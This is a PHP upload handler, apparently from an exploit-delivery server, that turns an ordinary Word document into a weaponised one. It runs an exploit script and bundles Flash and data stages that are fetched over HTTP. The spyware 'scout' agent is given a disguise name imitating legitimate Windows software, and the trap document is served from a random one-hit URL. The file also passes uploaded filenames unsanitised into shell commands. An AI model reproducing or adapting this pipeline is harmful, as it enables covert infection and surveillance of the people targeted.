src/exploit_vps/html/admin/upload.php
<?php
system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
system("rm -f /var/www/html/admin/2013-002-Word/*swf");
system("rm -f /var/www/html/admin/2013-002-Word/*exe");
system("rm -f /var/www/html/admin/2013-002-Word/*dat");
system("rm -f /var/www/html/admin/2013-002-Word/*docx");
system("rm -f /var/www/html/admin/2013-002-Word/*zip");
$scout_names =
array(
"C\x00a\x00t\x00a\x00l\x00y\x00s\x00" => "CCC.exe",
"P\x00o\x00w\x00e\x00r\x00D\x00V\x00D\x00" => "PDVD9Serv.exe",
"H\x00D\x00 \x00A\x00u\x00d\x00i\x00o\x00" => "RtDCpl.exe",
"O\x00u\x00t\x00-\x00o\x00f\x00-\x00B\x00r\x00o\x00w\x00s\x00e\x00r\x00" => "sllauncher.exe",
"L\x00i\x00v\x00e\x00 \x00I\x00D\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00" => "WLIDSVCM.exe",
);
function getScoutName($scout_full_path)
{
global $scout_names;
$scout_buff = file_get_contents($scout_full_path);
if (!strpos($scout_buff, "Iaskdj2AS"))
die("Bad scout version\n");
foreach ($scout_names as $key => $value)
if (strpos($scout_buff, $key))
return $value;
return "";
}
function GeraHash($qtd){
//Under the string $Caracteres you write all the characters you want to be used to randomly generate the code.
$Caracteres = 'abcdefghijklmnopqrstuvwxyz0123456789';
$QuantidadeCaracteres = strlen($Caracteres);
$QuantidadeCaracteres--;
$Hash=NULL;
for($x=1;$x<=$qtd;$x++){
$Posicao = rand(0,$QuantidadeCaracteres);
$Hash .= substr($Caracteres,$Posicao,1);
}
return $Hash;
}
function getName($path, $suffix)
{
$results = array();
$handler = opendir($path);
while ($file = readdir($handler))
{
if(strstr($file, $suffix))
{
return $file;
}
}
return "NAN";
}
$rand_directory = GeraHash(8);
#if(!isset($_FILES['modified']) || !isset($_FILES['original']) || !isset($_FILES['stage1']) || !isset($_FILES['stage2'])) die('Files not uploaded');
#if(!isset($_POST['directory'])) die('Directory not specified');
if(!mkdir('../files/'.$rand_directory)) die('Unable to create directory');
if(!mkdir('../files/'.$rand_directory."/cnt")) die('Unable to create directory');
$cwd = getcwd();
chdir("/var/www/html/admin/2013-002-Word");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-002-Word/original.docx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-002-Word/agent.exe");
$urlbase = 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/';
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y")
{
$scout_name = "demo.exe";
}
else
{
$scout_name = getScoutName("/var/www/html/admin/2013-002-Word/agent.exe");
}
if ($scout_name == "")
die('Unable to get scout name! :(');
mkdir("/tmp/$rand_directory");
copy("original.docx", $_FILES['original']['name']);
system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" > /dev/null 2>&1");
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y")
{
system("python26 exploit_demo.py payload:http $urlbase sendtotarget.zip original.docx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" DEMO > /tmp/py.log 2>&1");
}
else
{
system("python26 exploit.py payload:http $urlbase sendtotarget.zip original.docx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.docx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");
system("unzip -d /tmp/$rand_directory server.zip >> /tmp/py.log 2>&1");
#system("unzip -d /tmp/$rand_directory sendtotarget.zip >> /tmp/py.log 2>&1");
chdir($cwd);
$directory = '../files/'.$rand_directory;
$conf = array(
'modified' => 'cnt/modified.zip',
'original' => 'cnt/original.zip',
'browsercheck' => true,
'content-type' => 'application/msword',
'hits' => 1,
);
$target_zip_name = str_replace(".docx", ".zip", $_FILES['original']['name']);
file_put_contents("$directory/$target_zip_name", '$conf = '.var_export($conf, true).';');
copy("/var/www/html/admin/2013-002-Word/sendtotarget.zip", "$directory/cnt/modified.zip");
copy("/tmp/$rand_directory/original.zip", "$directory/cnt/original.zip");
#copy("/var/www/html/admin/2013-002-Word/original.docx", "$directory/cnt/original.docx");
$conf = array(
'modified' => 'cnt/stage1',
'hits' => 1,
);
$stage1_name = getName("/tmp/$rand_directory/", '.swf');
if ($stage1_name == "NAN")
die("Stage1 blank");
file_put_contents("$directory/".$stage1_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage1_name", "$directory/cnt/stage1");
$conf = array(
'modified' => 'cnt/stage2',
'hits' => 1,
);
$stage2_name = getName("/tmp/$rand_directory/", '.dat');
if ($stage2_name == "NAN")
die("Stage2 blank");
file_put_contents("$directory/".$stage2_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage2_name", "$directory/cnt/stage2");
#echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$_FILES['original']['name'];
echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$target_zip_name;
system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
system("rm -rf /tmp/$rand_directory");
system("rm -f /var/www/html/admin/2013-002-Word/*swf");
system("rm -f /var/www/html/admin/2013-002-Word/*exe");
system("rm -f /var/www/html/admin/2013-002-Word/*dat");
system("rm -f /var/www/html/admin/2013-002-Word/*docx");
system("rm -f /var/www/html/admin/2013-002-Word/*zip");
?>